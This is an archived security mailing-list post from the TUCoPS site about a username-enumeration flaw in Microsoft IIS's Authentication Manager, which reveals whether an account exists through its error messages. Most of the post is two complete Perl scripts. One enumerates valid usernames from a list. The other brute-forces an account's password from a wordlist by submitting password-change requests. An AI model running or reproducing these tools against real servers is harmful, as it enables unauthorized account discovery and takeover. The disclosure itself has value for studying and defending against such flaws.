Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: IIS :: bt113.txt

Microsoft IIS Authentication Manager Account Conformation Vuln?







Let me start off by saying that im not sure if this already exists, 

but i have never heard of it and neither has anyone i asked. So i'm 

SURE you all know about the IIS Authentication Manager Vuln 

(aexp4b.htr) and it can let people possibly bruteforce and change 

local account info on a Windows box. Well, while messing with a IIS 

machine this weekend I noticed that it also gives error messages that 

basically let you verify whether or not a user account exists. For 

example, if a user doesn't exist it says "The user name could not 

be found." and if the user does exist it will say "The specified 

network password is not correct" Anyway, I don't know if im the first 

person to notice this, but I have never heard of it. Also attached are 

two quick and dirty perl scripts i threw together to automate both the 

process of identifying an account and then bruteforcing it. Anyway, 

anyone ever notice or hear of the confirming if an account exists thing?





##########################################################################

#################

# Miscrosoft IIS Authentication Manager BruteForce Tool - By JeiAr 

http://www.gulftech.org

##########################################################################

#################

# This tool can be used to brute force user accounts via dictionary 

attack on the Microsoft

# IIS Authentication Manager. More details here 

http://www.securityfocus.com/archive/1/8515

##########################################################################

#################



use LWP::UserAgent;



##########################################################################

#################

# Time to create the new LWP User Agent, Clear the screen, And print out 

the scripts header

##########################################################################

#################



$ua = new LWP::UserAgent;

$ua->agent("AgentName/0.1 " . $ua->agent);

system('cls');

&header;



##########################################################################

#################

# Gather all user inputted data. Such as the domain name, host and 

location of the wordlist

##########################################################################

#################

 

print "Host: ";

$host=<STDIN>;

chomp $host;

print "Domain: ";

$domain=<STDIN>;

chomp $domain;

print "Account: ";

$account=<STDIN>;

chomp $account;

print "Word List: ";

$list=<STDIN>;

chomp $list;



##########################################################################

#################

# Opens the wordlist and puts the data into an array. afterward setting 

the count variables

##########################################################################

#################



open (DATAFILE, "$list");

@datafile = <DATAFILE>;

chomp(@datafile);

$length = @datafile;

$count = 0;

$found = 0;



&space;

print "Cracked Accounts\n";

print "----------------\n";



##########################################################################

#################

# Creates the HTTP request, Checks the responses, then prints out the 

username if it exists

##########################################################################

#################



while ($count < $length) {

$password = (@datafile[$count]);

my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";

   $req->content_type('application/x-www-form-urlencoded');

   $req->content

("domain=$domain&acct=$account&old=$password&new=$password&new2=$password"

);

my $res = $ua->request($req); 

$pattern = "Password successfully changed";  

$_ = $res->content;

if (/$pattern/) {

print "$account : $password\n";

last if (/$pattern/);

  } 

 $count++;

}



##########################################################################

#################

# Thats all folks. Prints out the final details and footer. Rest is just 

the subroutines :)

##########################################################################

#################



&space;

&footer;



sub header {

print "IIS Auth Manager Brute Forcing Tool By JeiAr 

[http://www.gulftech.org] \n";

print "-------------------------------------------------------------------

--- \n";

}



sub footer {

print "Session Results:\n";

print "--------------------\n";

print "Number Of Words : $length \n";

print "Number Of Tries : $count  \n";

}



sub space {

print "\n" x2;

}























##########################################################################

#################

# Miscrosoft IIS Authentication Manager Discovery Tool - By JeiAr 

[http://www.gulftech.org]

##########################################################################

#################

# This tool is used to find existing user accounts via a dictionary 

attack on the Microsoft

# IIS Authentication Manager. More details here 

http://www.securityfocus.com/archive/1/8515

##########################################################################

#################



use LWP::UserAgent;



##########################################################################

#################

# Time to create the new LWP User Agent, Clear the screen, And print out 

the scripts header

##########################################################################

#################



$ua = new LWP::UserAgent;

$ua->agent("AgentName/0.1 " . $ua->agent);

system('cls');

&header;



##########################################################################

#################

# Gather all user inputted data. Such as the domain name, host and 

location of the wordlist

##########################################################################

#################

 

print "Host: ";

$host=<STDIN>;

chomp $host;

print "Domain: ";

$domain=<STDIN>;

chomp $domain;

print "Account List: ";

$list=<STDIN>;

chomp $list;



##########################################################################

#################

# Opens the wordlist and puts the data into an array. afterward setting 

the count variables

##########################################################################

#################



open (DATAFILE, "$list");

@datafile = <DATAFILE>;

chomp(@datafile);

$length = @datafile;

$count = 0;

$found = 0;



&space;

print "Verified Accounts\n";

print "-----------------\n";



##########################################################################

#################

# Creates the HTTP request, Checks the responses, then prints out the 

username if it exists

##########################################################################

#################



while ($count < $length) {

$account = (@datafile[$count]);

my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";

   $req->content_type('application/x-www-form-urlencoded');

   $req->content("domain=$domain&acct=$account&old=&new=&new2=");

my $res = $ua->request($req); 

$pattern = "network password is not correct";  

$_ = $res->content;

if (/$pattern/) {

print "$account\n";

   $found++;

  } 

 $count++;

}



##########################################################################

#################

# Thats all folks. Prints out the final details and footer. Rest is just 

the subroutines :)

##########################################################################

#################



&space;

&footer;



sub header {

print "IIS Auth Manager User Discovery Tool By JeiAr 

[http://www.gulftech.org]\n";

print "-------------------------------------------------------------------

----\n";

}



sub footer {

print "Enumeration Results:\n";

print "--------------------\n";

print "Number Of Tries : $length \n";

print "Confirmed Users : $found  \n";

}



sub space {

print "\n" x2;

}









I hope the formatting of this message doesn't get trashed :o)


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH